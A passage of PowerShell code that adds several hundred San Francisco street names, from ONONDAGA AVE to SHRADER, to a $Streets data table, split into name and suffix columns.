$Streets.Rows.Add("ONONDAGA AVE","","ONONDAGA","AVE") + $null = $Streets.Rows.Add("OPAL PL","","OPAL","PL") + $null = $Streets.Rows.Add("OPALO LN","","OPALO","LN") + $null = $Streets.Rows.Add("OPHIR ALY","","OPHIR","ALY") + $null = $Streets.Rows.Add("ORA WAY","","ORA","WAY") + $null = $Streets.Rows.Add("ORANGE ALY","","ORANGE","ALY") + $null = $Streets.Rows.Add("ORBEN PL","","ORBEN","PL") + $null = $Streets.Rows.Add("ORD CT","","ORD","CT") + $null = $Streets.Rows.Add("ORD ST","","ORD","ST") + $null = $Streets.Rows.Add("ORDWAY ST","","ORDWAY","ST") + $null = $Streets.Rows.Add("OREILLY AVE","","OREILLY","AVE") + $null = $Streets.Rows.Add("ORIOLE WAY","","ORIOLE","WAY") + $null = $Streets.Rows.Add("ORIZABA AVE","","ORIZABA","AVE") + $null = $Streets.Rows.Add("ORSI CIR","","ORSI","CIR") + $null = $Streets.Rows.Add("ORTEGA ST","","ORTEGA","ST") + $null = $Streets.Rows.Add("ORTEGA WAY","","ORTEGA","WAY") + $null = $Streets.Rows.Add("OSAGE ALY","","OSAGE","ALY") + $null = $Streets.Rows.Add("OSCAR ALY","","OSCAR","ALY") + $null = $Streets.Rows.Add("OSCEOLA LN","","OSCEOLA","LN") + $null = $Streets.Rows.Add("OSGOOD PL","","OSGOOD","PL") + $null = $Streets.Rows.Add("OSHAUGHNESSY BLVD","","OSHAUGHNESSY","BLVD") + $null = $Streets.Rows.Add("OTEGA AVE","","OTEGA","AVE") + $null = $Streets.Rows.Add("OTIS ST","","OTIS","ST") + $null = $Streets.Rows.Add("OTSEGO AVE","","OTSEGO","AVE") + $null = $Streets.Rows.Add("OTTAWA AVE","","OTTAWA","AVE") + $null = $Streets.Rows.Add("OTTER COVE TER","","OTTER COVE","TER") + $null = $Streets.Rows.Add("OVERLOOK DR","","OVERLOOK","DR") + $null = $Streets.Rows.Add("OWEN ST","","OWEN","ST") + $null = $Streets.Rows.Add("OWENS ST","","OWENS","ST") + $null = $Streets.Rows.Add("OXFORD ST","","OXFORD","ST") + $null = $Streets.Rows.Add("OZBOURN CT","","OZBOURN","CT") + $null = $Streets.Rows.Add("PACHECO ST","","PACHECO","ST") + $null = $Streets.Rows.Add("PACIFIC AVE","","PACIFIC","AVE") + $null = $Streets.Rows.Add("PAGE ST","","PAGE","ST") + $null = $Streets.Rows.Add("PAGODA PL","","PAGODA","PL") + $null = $Streets.Rows.Add("PALM AVE","","PALM","AVE") + $null = $Streets.Rows.Add("PALMETTO AVE","","PALMETTO","AVE") + $null = $Streets.Rows.Add("PALO ALTO AVE","","PALO ALTO","AVE") + $null = $Streets.Rows.Add("PALOMA AVE","","PALOMA","AVE") + $null = $Streets.Rows.Add("PALOS PL","","PALOS","PL") + $null = $Streets.Rows.Add("PALOU AVE","","PALOU","AVE") + $null = $Streets.Rows.Add("PANAMA ST","","PANAMA","ST") + $null = $Streets.Rows.Add("PANORAMA DR","","PANORAMA","DR") + $null = $Streets.Rows.Add("PARADISE AVE","","PARADISE","AVE") + $null = $Streets.Rows.Add("PARAISO PL","","PARAISO","PL") + $null = $Streets.Rows.Add("PARAMOUNT TER","","PARAMOUNT","TER") + $null = $Streets.Rows.Add("PARIS ST","","PARIS","ST") + $null = $Streets.Rows.Add("PARK BLVD","","PARK","BLVD") + $null = $Streets.Rows.Add("PARK HILL AVE","","PARK HILL","AVE") + $null = $Streets.Rows.Add("PARK PRESIDIO BLVD","","PARK PRESIDIO","BLVD") + $null = $Streets.Rows.Add("PARK PRESIDIO BYPASS DR","","PARK PRESIDIO BYPASS","DR") + $null = $Streets.Rows.Add("PARKER AVE","","PARKER","AVE") + $null = $Streets.Rows.Add("PARKHURST ALY","","PARKHURST","ALY") + $null = $Streets.Rows.Add("PARKRIDGE DR","","PARKRIDGE","DR") + $null = $Streets.Rows.Add("PARNASSUS AVE","","PARNASSUS","AVE") + $null = $Streets.Rows.Add("PARQUE DR","","PARQUE","DR") + $null = $Streets.Rows.Add("PARSONS ST","","PARSONS","ST") + $null = $Streets.Rows.Add("PASADENA ST","","PASADENA","ST") + $null = $Streets.Rows.Add("PATTEN RD","","PATTEN","RD") + $null = $Streets.Rows.Add("PATTERSON ST","","PATTERSON","ST") + $null = $Streets.Rows.Add("PATTON CT","","PATTON","CT") + $null = $Streets.Rows.Add("PATTON ST","","PATTON","ST") + $null = $Streets.Rows.Add("PAUL AVE","","PAUL","AVE") + $null = $Streets.Rows.Add("PAULDING ST","","PAULDING","ST") + $null = $Streets.Rows.Add("PAYSON ST","","PAYSON","ST") + $null = $Streets.Rows.Add("PEABODY ST","","PEABODY","ST") + $null = $Streets.Rows.Add("PEARL ST","","PEARL","ST") + $null = $Streets.Rows.Add("PEEK LN","","PEEK","LN") + $null = $Streets.Rows.Add("PELICAN COVE TER","","PELICAN COVE","TER") + $null = $Streets.Rows.Add("PELTON PL","","PELTON","PL") + $null = $Streets.Rows.Add("PEMBERTON PL","","PEMBERTON","PL") + $null = $Streets.Rows.Add("PENA ST","","PENA","ST") + $null = $Streets.Rows.Add("PENINSULA AVE","","PENINSULA","AVE") + $null = $Streets.Rows.Add("PENNINGTON ST","","PENNINGTON","ST") + $null = $Streets.Rows.Add("PENNSYLVANIA AVE","","PENNSYLVANIA","AVE") + $null = $Streets.Rows.Add("PENNY LN","","PENNY","LN") + $null = $Streets.Rows.Add("PERALTA AVE","","PERALTA","AVE") + $null = $Streets.Rows.Add("PERASTO AVE","","PERASTO","AVE") + $null = $Streets.Rows.Add("PEREGO TER","","PEREGO","TER") + $null = $Streets.Rows.Add("PERIMETER PATH","","PERIMETER","PATH") + $null = $Streets.Rows.Add("PERINE PL","","PERINE","PL") + $null = $Streets.Rows.Add("PERRY ST","","PERRY","ST") + $null = $Streets.Rows.Add("PERSHING DR","","PERSHING","DR") + $null = $Streets.Rows.Add("PERSIA AVE","","PERSIA","AVE") + $null = $Streets.Rows.Add("PERU AVE","","PERU","AVE") + $null = $Streets.Rows.Add("PETER YORKE WAY","","PETER YORKE","WAY") + $null = $Streets.Rows.Add("PETERS AVE","","PETERS","AVE") + $null = $Streets.Rows.Add("PETRARCH PL","","PETRARCH","PL") + $null = $Streets.Rows.Add("PFEIFFER ST","","PFEIFFER","ST") + $null = $Streets.Rows.Add("BRISTOL CT","","BRISTOL","CT") + $null = $Streets.Rows.Add("PHELPS ST","","PHELPS","ST") + $null = $Streets.Rows.Add("PHOENIX TER","","PHOENIX","TER") + $null = $Streets.Rows.Add("PICO AVE","","PICO","AVE") + $null = $Streets.Rows.Add("PIEDMONT ST","","PIEDMONT","ST") + $null = $Streets.Rows.Add("PIERCE ST","","PIERCE","ST") + $null = $Streets.Rows.Add("MAYBECK ST","","MAYBECK","ST") + $null = $Streets.Rows.Add("PILGRIM AVE","","PILGRIM","AVE") + $null = $Streets.Rows.Add("PINAR LN","","PINAR","LN") + $null = $Streets.Rows.Add("PINE ST","","PINE","ST") + $null = $Streets.Rows.Add("PINEHURST WAY","","PINEHURST","WAY") + $null = $Streets.Rows.Add("PINK ALY","","PINK","ALY") + $null = $Streets.Rows.Add("PINO ALY","","PINO","ALY") + $null = $Streets.Rows.Add("PINTO AVE","","PINTO","AVE") + $null = $Streets.Rows.Add("PIOCHE ST","","PIOCHE","ST") + $null = $Streets.Rows.Add("PIPER LOOP","","PIPER","LOOP") + $null = $Streets.Rows.Add("PIXLEY ST","","PIXLEY","ST") + $null = $Streets.Rows.Add("PIZARRO WAY","","PIZARRO","WAY") + $null = $Streets.Rows.Add("PLAZA ST","","PLAZA","ST") + $null = $Streets.Rows.Add("PLEASANT ST","","PLEASANT","ST") + $null = $Streets.Rows.Add("PLUM ST","","PLUM","ST") + $null = $Streets.Rows.Add("PLYMOUTH AVE","","PLYMOUTH","AVE") + $null = $Streets.Rows.Add("POINT LOBOS AVE","","POINT LOBOS","AVE") + $null = $Streets.Rows.Add("POLARIS WAY","","POLARIS","WAY") + $null = $Streets.Rows.Add("POLK ST","","POLK","ST") + $null = $Streets.Rows.Add("POLLARD PL","","POLLARD","PL") + $null = $Streets.Rows.Add("POLLOCK ST","","POLLOCK","ST") + $null = $Streets.Rows.Add("POMONA ST","","POMONA","ST") + $null = $Streets.Rows.Add("POND ST","","POND","ST") + $null = $Streets.Rows.Add("PONTIAC ST","","PONTIAC","ST") + $null = $Streets.Rows.Add("POPE CT","","POPE","CT") + $null = $Streets.Rows.Add("POPE RD","","POPE","RD") + $null = $Streets.Rows.Add("POPE ST","","POPE","ST") + $null = $Streets.Rows.Add("POPLAR ST","","POPLAR","ST") + $null = $Streets.Rows.Add("POPPY LN","","POPPY","LN") + $null = $Streets.Rows.Add("PORTAL DR","","PORTAL","DR") + $null = $Streets.Rows.Add("PORTAL PATH","","PORTAL","PATH") + $null = $Streets.Rows.Add("PORTER ST","","PORTER","ST") + $null = $Streets.Rows.Add("PORTOLA DR","","PORTOLA","DR") + $null = $Streets.Rows.Add("PORTOLA ST","","PORTOLA","ST") + $null = $Streets.Rows.Add("POST ST","","POST","ST") + $null = $Streets.Rows.Add("POTOMAC ST","","POTOMAC","ST") + $null = $Streets.Rows.Add("POTRERO AVE","","POTRERO","AVE") + $null = $Streets.Rows.Add("POWELL ST","","POWELL","ST") + $null = $Streets.Rows.Add("POWERS AVE","","POWERS","AVE") + $null = $Streets.Rows.Add("POWHATTAN AVE","","POWHATTAN","AVE") + $null = $Streets.Rows.Add("PRADO ST","","PRADO","ST") + $null = $Streets.Rows.Add("PRAGUE ST","","PRAGUE","ST") + $null = $Streets.Rows.Add("PRATT PL","","PRATT","PL") + $null = $Streets.Rows.Add("PRECITA AVE","","PRECITA","AVE") + $null = $Streets.Rows.Add("PRENTISS ST","","PRENTISS","ST") + $null = $Streets.Rows.Add("PRESCOTT CT","","PRESCOTT","CT") + $null = $Streets.Rows.Add("PRESIDIO AVE","","PRESIDIO","AVE") + $null = $Streets.Rows.Add("PRESIDIO BLVD","","PRESIDIO","BLVD") + $null = $Streets.Rows.Add("PRESIDIO TER","","PRESIDIO","TER") + $null = $Streets.Rows.Add("PRETOR WAY","","PRETOR","WAY") + $null = $Streets.Rows.Add("PRIEST ST","","PRIEST","ST") + $null = $Streets.Rows.Add("PRINCETON ST","","PRINCETON","ST") + $null = $Streets.Rows.Add("PROGRESS ST","","PROGRESS","ST") + $null = $Streets.Rows.Add("PROSPECT AVE","","PROSPECT","AVE") + $null = $Streets.Rows.Add("PROSPER ST","","PROSPER","ST") + $null = $Streets.Rows.Add("PUBLIC PARK","","PUBLIC","PARK") + $null = $Streets.Rows.Add("PUEBLO ST","","PUEBLO","ST") + $null = $Streets.Rows.Add("PULASKI AVE","","PULASKI","AVE") + $null = $Streets.Rows.Add("PUTNAM ST","","PUTNAM","ST") + $null = $Streets.Rows.Add("QUANE ST","","QUANE","ST") + $null = $Streets.Rows.Add("QUARRY RD","","QUARRY","RD") + $null = $Streets.Rows.Add("QUARTZ WAY","","QUARTZ","WAY") + $null = $Streets.Rows.Add("QUEBEC AVE","","QUEBEC","AVE") + $null = $Streets.Rows.Add("QUESADA AVE","","QUESADA","AVE") + $null = $Streets.Rows.Add("QUICKSTEP LN","","QUICKSTEP","LN") + $null = $Streets.Rows.Add("QUINCY ST","","QUINCY","ST") + $null = $Streets.Rows.Add("QUINT ST","","QUINT","ST") + $null = $Streets.Rows.Add("QUINTARA ST","","QUINTARA","ST") + $null = $Streets.Rows.Add("R ST","","R","ST") + $null = $Streets.Rows.Add("RACCOON DR","","RACCOON","DR") + $null = $Streets.Rows.Add("RACINE LN","","RACINE","LN") + $null = $Streets.Rows.Add("RADIO TER","","RADIO","TER") + $null = $Streets.Rows.Add("RAE AVE","","RAE","AVE") + $null = $Streets.Rows.Add("RALEIGH ST","","RALEIGH","ST") + $null = $Streets.Rows.Add("RALSTON AVE","","RALSTON","AVE") + $null = $Streets.Rows.Add("RALSTON ST","","RALSTON","ST") + $null = $Streets.Rows.Add("RAMONA AVE","","RAMONA","AVE") + $null = $Streets.Rows.Add("RAMSEL CT","","RAMSEL","CT") + $null = $Streets.Rows.Add("RAMSELL ST","","RAMSELL","ST") + $null = $Streets.Rows.Add("RANDALL ST","","RANDALL","ST") + $null = $Streets.Rows.Add("RANDOLPH ST","","RANDOLPH","ST") + $null = $Streets.Rows.Add("RANKIN ST","","RANKIN","ST") + $null = $Streets.Rows.Add("RAUSCH ST","","RAUSCH","ST") + $null = $Streets.Rows.Add("RAVENWOOD DR","","RAVENWOOD","DR") + $null = $Streets.Rows.Add("RAWLES ST","","RAWLES","ST") + $null = $Streets.Rows.Add("RAYBURN ST","","RAYBURN","ST") + $null = $Streets.Rows.Add("RAYCLIFF TER","","RAYCLIFF","TER") + $null = $Streets.Rows.Add("RAYMOND AVE","","RAYMOND","AVE") + $null = $Streets.Rows.Add("REARDON RD","","REARDON","RD") + $null = $Streets.Rows.Add("REBECCA LN","","REBECCA","LN") + $null = $Streets.Rows.Add("RECYCLE RD","","RECYCLE","RD") + $null = $Streets.Rows.Add("RECYCLING CENTER ACCESS RD","","RECYCLING CENTER ACCESS","RD") + $null = $Streets.Rows.Add("RED LEAF CT","","RED LEAF","CT") + $null = $Streets.Rows.Add("RED ROCK WAY","","RED ROCK","WAY") + $null = $Streets.Rows.Add("REDDY ST","","REDDY","ST") + $null = $Streets.Rows.Add("REDFIELD ALY","","REDFIELD","ALY") + $null = $Streets.Rows.Add("REDONDO ST","","REDONDO","ST") + $null = $Streets.Rows.Add("REDWOOD ST","","REDWOOD","ST") + $null = $Streets.Rows.Add("REED ST","","REED","ST") + $null = $Streets.Rows.Add("REEVES CT","","REEVES","CT") + $null = $Streets.Rows.Add("REGENT ST","","REGENT","ST") + $null = $Streets.Rows.Add("RENO PL","","RENO","PL") + $null = $Streets.Rows.Add("REPOSA WAY","","REPOSA","WAY") + $null = $Streets.Rows.Add("RESERVOIR ST","","RESERVOIR","ST") + $null = $Streets.Rows.Add("RESTANI STWY","","RESTANI","STWY") + $null = $Streets.Rows.Add("RESTANI WAY","","RESTANI","WAY") + $null = $Streets.Rows.Add("RETIRO WAY","","RETIRO","WAY") + $null = $Streets.Rows.Add("REUEL CT","","REUEL","CT") + $null = $Streets.Rows.Add("REVERE AVE","","REVERE","AVE") + $null = $Streets.Rows.Add("REX AVE","","REX","AVE") + $null = $Streets.Rows.Add("REY ST","","REY","ST") + $null = $Streets.Rows.Add("RHINE ST","","RHINE","ST") + $null = $Streets.Rows.Add("RHODE ISLAND ST","","RHODE ISLAND","ST") + $null = $Streets.Rows.Add("RICE ST","","RICE","ST") + $null = $Streets.Rows.Add("RICHARD HENRY DANA PL","","RICHARD HENRY DANA","PL") + $null = $Streets.Rows.Add("RICHARDS CIR","","RICHARDS","CIR") + $null = $Streets.Rows.Add("RICHARDSON AVE","","RICHARDSON","AVE") + $null = $Streets.Rows.Add("RICHLAND AVE","","RICHLAND","AVE") + $null = $Streets.Rows.Add("RICHTER AVE","","RICHTER","AVE") + $null = $Streets.Rows.Add("RICKARD ST","","RICKARD","ST") + $null = $Streets.Rows.Add("RICO WAY","","RICO","WAY") + $null = $Streets.Rows.Add("RIDGE CT","","RIDGE","CT") + $null = $Streets.Rows.Add("RIDGE LN","","RIDGE","LN") + $null = $Streets.Rows.Add("RIDGEWOOD AVE","","RIDGEWOOD","AVE") + $null = $Streets.Rows.Add("RILEY AVE","","RILEY","AVE") + $null = $Streets.Rows.Add("RINCON ST","","RINCON","ST") + $null = $Streets.Rows.Add("RINGOLD ST","","RINGOLD","ST") + $null = $Streets.Rows.Add("RIO CT","","RIO","CT") + $null = $Streets.Rows.Add("RIO VERDE ST","","RIO VERDE","ST") + $null = $Streets.Rows.Add("RIPLEY ST","","RIPLEY","ST") + $null = $Streets.Rows.Add("RITCH ST","","RITCH","ST") + $null = $Streets.Rows.Add("RIVAS AVE","","RIVAS","AVE") + $null = $Streets.Rows.Add("RIVERA ST","","RIVERA","ST") + $null = $Streets.Rows.Add("RIVERTON DR","","RIVERTON","DR") + $null = $Streets.Rows.Add("RIVOLI ST","","RIVOLI","ST") + $null = $Streets.Rows.Add("RIZAL ST","","RIZAL","ST") + $null = $Streets.Rows.Add("ROACH ST","","ROACH","ST") + $null = $Streets.Rows.Add("ROANOKE ST","","ROANOKE","ST") + $null = $Streets.Rows.Add("ROBBLEE AVE","","ROBBLEE","AVE") + $null = $Streets.Rows.Add("ROBERT C LEVY TUNL","","ROBERT C LEVY","TUNL") + $null = $Streets.Rows.Add("ROBERT KIRK LN","","ROBERT KIRK","LN") + $null = $Streets.Rows.Add("ROBINHOOD DR","","ROBINHOOD","DR") + $null = $Streets.Rows.Add("ROBINSON DR","","ROBINSON","DR") + $null = $Streets.Rows.Add("ROBINSON ST","","ROBINSON","ST") + $null = $Streets.Rows.Add("ROCK ALY","","ROCK","ALY") + $null = $Streets.Rows.Add("ROCKAWAY AVE","","ROCKAWAY","AVE") + $null = $Streets.Rows.Add("ROCKDALE DR","","ROCKDALE","DR") + $null = $Streets.Rows.Add("ROCKLAND ST","","ROCKLAND","ST") + $null = $Streets.Rows.Add("ROCKRIDGE DR","","ROCKRIDGE","DR") + $null = $Streets.Rows.Add("ROCKWOOD CT","","ROCKWOOD","CT") + $null = $Streets.Rows.Add("ROD RD","","ROD","RD") + $null = $Streets.Rows.Add("RODGERS ST","","RODGERS","ST") + $null = $Streets.Rows.Add("RODRIGUEZ ST","","RODRIGUEZ","ST") + $null = $Streets.Rows.Add("ROEMER WAY","","ROEMER","WAY") + $null = $Streets.Rows.Add("ROLPH ST","","ROLPH","ST") + $null = $Streets.Rows.Add("ROMAIN ST","","ROMAIN","ST") + $null = $Streets.Rows.Add("ROME ST","","ROME","ST") + $null = $Streets.Rows.Add("ROMOLO ST","","ROMOLO","ST") + $null = $Streets.Rows.Add("RONDEL PL","","RONDEL","PL") + $null = $Streets.Rows.Add("ROOSEVELT WAY","","ROOSEVELT","WAY") + $null = $Streets.Rows.Add("ROSA PARKS LN","","ROSA PARKS","LN") + $null = $Streets.Rows.Add("ROSCOE ST","","ROSCOE","ST") + $null = $Streets.Rows.Add("ROSE ST","","ROSE","ST") + $null = $Streets.Rows.Add("ROSELLA CT","","ROSELLA","CT") + $null = $Streets.Rows.Add("ROSELYN TER","","ROSELYN","TER") + $null = $Streets.Rows.Add("ROSEMARY CT","","ROSEMARY","CT") + $null = $Streets.Rows.Add("ROSEMONT PL","","ROSEMONT","PL") + $null = $Streets.Rows.Add("ROSENKRANZ ST","","ROSENKRANZ","ST") + $null = $Streets.Rows.Add("ROSEWOOD DR","","ROSEWOOD","DR") + $null = $Streets.Rows.Add("ROSIE LEE LN","","ROSIE LEE","LN") + $null = $Streets.Rows.Add("ROSS ALY","","ROSS","ALY") + $null = $Streets.Rows.Add("ROSSI AVE","","ROSSI","AVE") + $null = $Streets.Rows.Add("ROSSMOOR DR","","ROSSMOOR","DR") + $null = $Streets.Rows.Add("ROTTECK ST","","ROTTECK","ST") + $null = $Streets.Rows.Add("ROUSSEAU ST","","ROUSSEAU","ST") + $null = $Streets.Rows.Add("ROYAL LN","","ROYAL","LN") + $null = $Streets.Rows.Add("RUCKMAN AVE","","RUCKMAN","AVE") + $null = $Streets.Rows.Add("RUDDEN AVE","","RUDDEN","AVE") + $null = $Streets.Rows.Add("RUGER ST","","RUGER","ST") + $null = $Streets.Rows.Add("RUSS ST","","RUSS","ST") + $null = $Streets.Rows.Add("RUSSELL ST","","RUSSELL","ST") + $null = $Streets.Rows.Add("RUSSIA AVE","","RUSSIA","AVE") + $null = $Streets.Rows.Add("RUSSIAN HILL PL","","RUSSIAN HILL","PL") + $null = $Streets.Rows.Add("RUTH ST","","RUTH","ST") + $null = $Streets.Rows.Add("RUTLAND ST","","RUTLAND","ST") + $null = $Streets.Rows.Add("RUTLEDGE ST","","RUTLEDGE","ST") + $null = $Streets.Rows.Add("SABIN PL","","SABIN","PL") + $null = $Streets.Rows.Add("SACRAMENTO ST","","SACRAMENTO","ST") + $null = $Streets.Rows.Add("SADDLEBACK DR","","SADDLEBACK","DR") + $null = $Streets.Rows.Add("SADOWA ST","","SADOWA","ST") + $null = $Streets.Rows.Add("SAFIRA LN","","SAFIRA","LN") + $null = $Streets.Rows.Add("SAGAMORE ST","","SAGAMORE","ST") + $null = $Streets.Rows.Add("SAINT CHARLES AVE","","SAINT CHARLES","AVE") + $null = $Streets.Rows.Add("SAINT CROIX DR","","SAINT CROIX","DR") + $null = $Streets.Rows.Add("SAINT ELMO WAY","","SAINT ELMO","WAY") + $null = $Streets.Rows.Add("SAINT FRANCIS BLVD","","SAINT FRANCIS","BLVD") + $null = $Streets.Rows.Add("SAINT FRANCIS PL","","SAINT FRANCIS","PL") + $null = $Streets.Rows.Add("SAINT GEORGE ALY","","SAINT GEORGE","ALY") + $null = $Streets.Rows.Add("SAINT GERMAIN AVE","","SAINT GERMAIN","AVE") + $null = $Streets.Rows.Add("SAINT JOSEPHS AVE","","SAINT JOSEPHS","AVE") + $null = $Streets.Rows.Add("SAINT LOUIS ALY","","SAINT LOUIS","ALY") + $null = $Streets.Rows.Add("SAINT MARYS AVE","","SAINT MARYS","AVE") + $null = $Streets.Rows.Add("SAL ST","","SAL","ST") + $null = $Streets.Rows.Add("SALA TER","","SALA","TER") + $null = $Streets.Rows.Add("SALINAS AVE","","SALINAS","AVE") + $null = $Streets.Rows.Add("SALMON ST","","SALMON","ST") + $null = $Streets.Rows.Add("SAMOSET ST","","SAMOSET","ST") + $null = $Streets.Rows.Add("SAMPSON AVE","","SAMPSON","AVE") + $null = $Streets.Rows.Add("SAN ALESO AVE","","SAN ALESO","AVE") + $null = $Streets.Rows.Add("SAN ANDREAS WAY","","SAN ANDREAS","WAY") + $null = $Streets.Rows.Add("SAN ANSELMO AVE","","SAN ANSELMO","AVE") + $null = $Streets.Rows.Add("SAN ANTONIO PL","","SAN ANTONIO","PL") + $null = $Streets.Rows.Add("SAN BENITO WAY","","SAN BENITO","WAY") + $null = $Streets.Rows.Add("SAN BRUNO AVE","","SAN BRUNO","AVE") + $null = $Streets.Rows.Add("SAN BRUNO AV OFF RAMP","","SAN BRUNO AV OFF","RAMP") + $null = $Streets.Rows.Add("SAN BRUNO AV ON RAMP","","SAN BRUNO AV ON","RAMP") + $null = $Streets.Rows.Add("SAN BUENAVENTURA WAY","","SAN BUENAVENTURA","WAY") + $null = $Streets.Rows.Add("SAN CARLOS ST","","SAN CARLOS","ST") + $null = $Streets.Rows.Add("SAN DIEGO AVE","","SAN DIEGO","AVE") + $null = $Streets.Rows.Add("SAN FELIPE AVE","","SAN FELIPE","AVE") + $null = $Streets.Rows.Add("SAN FERNANDO WAY","","SAN FERNANDO","WAY") + $null = $Streets.Rows.Add("SAN GABRIEL AVE","","SAN GABRIEL","AVE") + $null = $Streets.Rows.Add("SAN JACINTO WAY","","SAN JACINTO","WAY") + $null = $Streets.Rows.Add("SAN JOSE AVE","","SAN JOSE","AVE") + $null = $Streets.Rows.Add("SAN JOSE AV OFF RAMP","","SAN JOSE AV OFF","RAMP") + $null = $Streets.Rows.Add("SAN JOSE AV ON RAMP","","SAN JOSE AV ON","RAMP") + $null = $Streets.Rows.Add("SAN JUAN AVE","","SAN JUAN","AVE") + $null = $Streets.Rows.Add("SAN LEANDRO WAY","","SAN LEANDRO","WAY") + $null = $Streets.Rows.Add("SAN LORENZO WAY","","SAN LORENZO","WAY") + $null = $Streets.Rows.Add("SAN LUIS AVE","","SAN LUIS","AVE") + $null = $Streets.Rows.Add("SAN MARCOS AVE","","SAN MARCOS","AVE") + $null = $Streets.Rows.Add("SAN MIGUEL ST","","SAN MIGUEL","ST") + $null = $Streets.Rows.Add("SAN PABLO AVE","","SAN PABLO","AVE") + $null = $Streets.Rows.Add("SAN RAFAEL WAY","","SAN RAFAEL","WAY") + $null = $Streets.Rows.Add("SAN RAMON WAY","","SAN RAMON","WAY") + $null = $Streets.Rows.Add("SANCHES ST","","SANCHES","ST") + $null = $Streets.Rows.Add("SANCHEZ ST","","SANCHEZ","ST") + $null = $Streets.Rows.Add("SANDPIPER COVE WAY","","SANDPIPER COVE","WAY") + $null = $Streets.Rows.Add("SANSOME ST","","SANSOME","ST") + $null = $Streets.Rows.Add("SANTA ANA AVE","","SANTA ANA","AVE") + $null = $Streets.Rows.Add("SANTA BARBARA AVE","","SANTA BARBARA","AVE") + $null = $Streets.Rows.Add("SANTA CLARA AVE","","SANTA CLARA","AVE") + $null = $Streets.Rows.Add("SANTA CRUZ AVE","","SANTA CRUZ","AVE") + $null = $Streets.Rows.Add("SANTA FE AVE","","SANTA FE","AVE") + $null = $Streets.Rows.Add("SANTA MARINA ST","","SANTA MARINA","ST") + $null = $Streets.Rows.Add("SANTA MONICA WAY","","SANTA MONICA","WAY") + $null = $Streets.Rows.Add("SANTA PAULA AVE","","SANTA PAULA","AVE") + $null = $Streets.Rows.Add("SANTA RITA AVE","","SANTA RITA","AVE") + $null = $Streets.Rows.Add("SANTA ROSA AVE","","SANTA ROSA","AVE") + $null = $Streets.Rows.Add("SANTA YNEZ AVE","","SANTA YNEZ","AVE") + $null = $Streets.Rows.Add("SANTA YSABEL AVE","","SANTA YSABEL","AVE") + $null = $Streets.Rows.Add("SANTIAGO ST","","SANTIAGO","ST") + $null = $Streets.Rows.Add("SANTOS ST","","SANTOS","ST") + $null = $Streets.Rows.Add("SARGENT ST","","SARGENT","ST") + $null = $Streets.Rows.Add("SAROYAN PL","","SAROYAN","PL") + $null = $Streets.Rows.Add("SATURN ST","","SATURN","ST") + $null = $Streets.Rows.Add("SAUL ST","","SAUL","ST") + $null = $Streets.Rows.Add("SAWYER ST","","SAWYER","ST") + $null = $Streets.Rows.Add("SCENIC WAY","","SCENIC","WAY") + $null = $Streets.Rows.Add("SCHOFIELD CT","","SCHOFIELD","CT") + $null = $Streets.Rows.Add("SCHOFIELD RD","","SCHOFIELD","RD") + $null = $Streets.Rows.Add("SCHOOL ALY","","SCHOOL","ALY") + $null = $Streets.Rows.Add("SCHWERIN ST","","SCHWERIN","ST") + $null = $Streets.Rows.Add("SCIENCE CIR","","SCIENCE","CIR") + $null = $Streets.Rows.Add("SCOTIA AVE","","SCOTIA","AVE") + $null = $Streets.Rows.Add("SCOTLAND ST","","SCOTLAND","ST") + $null = $Streets.Rows.Add("SCOTT ALY","","SCOTT","ALY") + $null = $Streets.Rows.Add("SCOTT ST","","SCOTT","ST") + $null = $Streets.Rows.Add("SEA VIEW TER","","SEA VIEW","TER") + $null = $Streets.Rows.Add("SEACLIFF AVE","","SEACLIFF","AVE") + $null = $Streets.Rows.Add("SEAL COVE TER","","SEAL COVE","TER") + $null = $Streets.Rows.Add("SEAL ROCK DR","","SEAL ROCK","DR") + $null = $Streets.Rows.Add("SEARS ST","","SEARS","ST") + $null = $Streets.Rows.Add("SEAWELL LN","","SEAWELL","LN") + $null = $Streets.Rows.Add("SECOND DR","","SECOND","DR") + $null = $Streets.Rows.Add("SECURITY PACIFIC PL","","SECURITY PACIFIC","PL") + $null = $Streets.Rows.Add("SELBY ST","","SELBY","ST") + $null = $Streets.Rows.Add("SELMA WAY","","SELMA","WAY") + $null = $Streets.Rows.Add("SEMINOLE AVE","","SEMINOLE","AVE") + $null = $Streets.Rows.Add("SENECA AVE","","SENECA","AVE") + $null = $Streets.Rows.Add("SEQUOIA WAY","","SEQUOIA","WAY") + $null = $Streets.Rows.Add("SERGEANT JOHN V YOUNG ST","","SERGEANT JOHN V YOUNG","ST") + $null = $Streets.Rows.Add("SERRANO DR","","SERRANO","DR") + $null = $Streets.Rows.Add("SERVICE ST","","SERVICE","ST") + $null = $Streets.Rows.Add("SEVERN ST","","SEVERN","ST") + $null = $Streets.Rows.Add("SEVILLE ST","","SEVILLE","ST") + $null = $Streets.Rows.Add("SEWARD ST","","SEWARD","ST") + $null = $Streets.Rows.Add("SEYMOUR ST","","SEYMOUR","ST") + $null = $Streets.Rows.Add("SFGH ACCESS","","SFGH ACCESS","") + $null = $Streets.Rows.Add("SHAFTER AVE","","SHAFTER","AVE") + $null = $Streets.Rows.Add("SHAFTER CT","","SHAFTER","CT") + $null = $Streets.Rows.Add("SHAFTER RD","","SHAFTER","RD") + $null = $Streets.Rows.Add("SHAKESPEARE ST","","SHAKESPEARE","ST") + $null = $Streets.Rows.Add("SHANNON ST","","SHANNON","ST") + $null = $Streets.Rows.Add("SHARON ST","","SHARON","ST") + $null = $Streets.Rows.Add("SHARP PL","","SHARP","PL") + $null = $Streets.Rows.Add("SHAW ALY","","SHAW","ALY") + $null = $Streets.Rows.Add("SHAWNEE AVE","","SHAWNEE","AVE") + $null = $Streets.Rows.Add("SHELDON TER","","SHELDON","TER") + $null = $Streets.Rows.Add("SHEPHARD PL","","SHEPHARD","PL") + $null = $Streets.Rows.Add("SHERIDAN AVE","","SHERIDAN","AVE") + $null = $Streets.Rows.Add("SHERIDAN ST","","SHERIDAN","ST") + $null = $Streets.Rows.Add("SHERMAN RD","","SHERMAN","RD") + $null = $Streets.Rows.Add("SHERMAN ST","","SHERMAN","ST") + $null = $Streets.Rows.Add("SHERWOOD CT","","SHERWOOD","CT") + $null = $Streets.Rows.Add("SHIELDS ST","","SHIELDS","ST") + $null = $Streets.Rows.Add("SHIP ST","","SHIP","ST") + $null = $Streets.Rows.Add("SHIPLEY ST","","SHIPLEY","ST") + $null = $Streets.Rows.Add("SHORE VIEW AVE","","SHORE VIEW","AVE") + $null = $Streets.Rows.Add("SHORT ST","","SHORT","ST") + $null = $Streets.Rows.Add("SHOTWELL ST","","SHOTWELL","ST") + $null = $Streets.Rows.Add("SHOUP AVE","","SHOUP","AVE") + $null = $Streets.Rows.Add("SHRADER 